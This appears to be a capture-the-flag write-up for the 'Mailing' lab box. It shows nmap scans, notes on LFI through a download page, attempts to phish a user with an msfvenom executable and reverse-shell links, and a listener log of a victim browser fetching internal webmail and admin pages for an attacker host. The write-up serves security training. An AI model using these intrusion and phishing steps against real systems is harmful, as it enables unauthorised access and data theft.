Nmap scan report for 10.10.11.14
Host is up (0.047s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
5040/tcp open unknown
5985/tcp open wsman
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
51866/tcp open unknown
Let's get a vulnerability overview:
Interesting ports: 25 (SMTP), 80 (HTTP), 110 (POP3), 143 (IMAP), 445 (SMB), 587 (SMTP) and possible 5040 and 7680.
I tried some SMTP basic capability enumeration. Navigated to the webpage on 80:
Checked the instructions and tried to replicate, but this "user" doesn't exist!
The download function is interesting though. In the mean-time I ran feroxbuster too:
Let's see if we can do LFI through the download.php function!
From the ports opened we could see that this is a Windows box, so:
Sweet! We can LFI!
I managed to get them working on Thunderbird as administrator@mailing.htb.
Now I am sending a malicious exe crafted with msfvenom to support (maya).
Hitting send...
Now we wait...
Realizing that no one opens our attachments, so I tried with direct link in the mail:
Although nobody opens the powershell... Let's see, by elimination we need some phish e-mail that will either launch direct revshell through browser, either hmm..
No creds coming back :(
It turns out this works:
Using the same idea I could enumerate some ports on the box:
I realized this gets too much, it has to be something easier such as an outlook exploit.
Nmap scan report for 10.10.11.14
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL TOP USER
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: RIGHTS=texkA0001 IDLE OK CHILDREN completed ACL CAPABILITY NAMESPACE IMAP4 IMAP4rev1 QUOTA SORT
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
587/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
993/tcp open ssl/imap hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: RIGHTS=texkA0001 IDLE OK CHILDREN completed ACL CAPABILITY NAMESPACE IMAP4 IMAP4rev1 QUOTA SORT
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
51866/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-12T17:41:34
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
2025-05-13 12:36:44,816 Connection established from ('10.10.11.14', 57048)
2025-05-13 12:36:44,996 Received message: {"type":"page_load","url":"http://10.10.16.9:9090/pl2.html","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"}
2025-05-13 12:36:45,121 Received message: {"type":"internal_fetch","url":"http://localhost/webmail/inbox","status":"success"}
2025-05-13 12:36:45,121 Received message: {"type":"internal_fetch","url":"http://localhost/admin/dashboard","status":"success"}
2025-05-13 12:36:45,121 Received message: {"type":"internal_fetch","url":"http://localhost/mail/inbox","status":"success"}
2025-05-13 12:36:45,301 connection open
2025-05-13 12:36:45,301 Connection established from ('10.10.11.14', 57056)
2025-05-13 12:36:45,384 Received message: {"type":"page_load","url":"http://10.10.16.9:9090/pl2.html","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"}
2025-05-13 12:36:45,426 Received message: {"type":"internal_fetch","url":"http://localhost/mail/inbox","status":"success"}
2025-05-13 12:36:45,426 Received message: {"type":"internal_fetch","url":"http://localhost/webmail/inbox","status":"success"}
2025-05-13 12:36:45,426 Received message: {"type":"internal_fetch","url":"http://localhost/admin/dashboard","status":"success"}
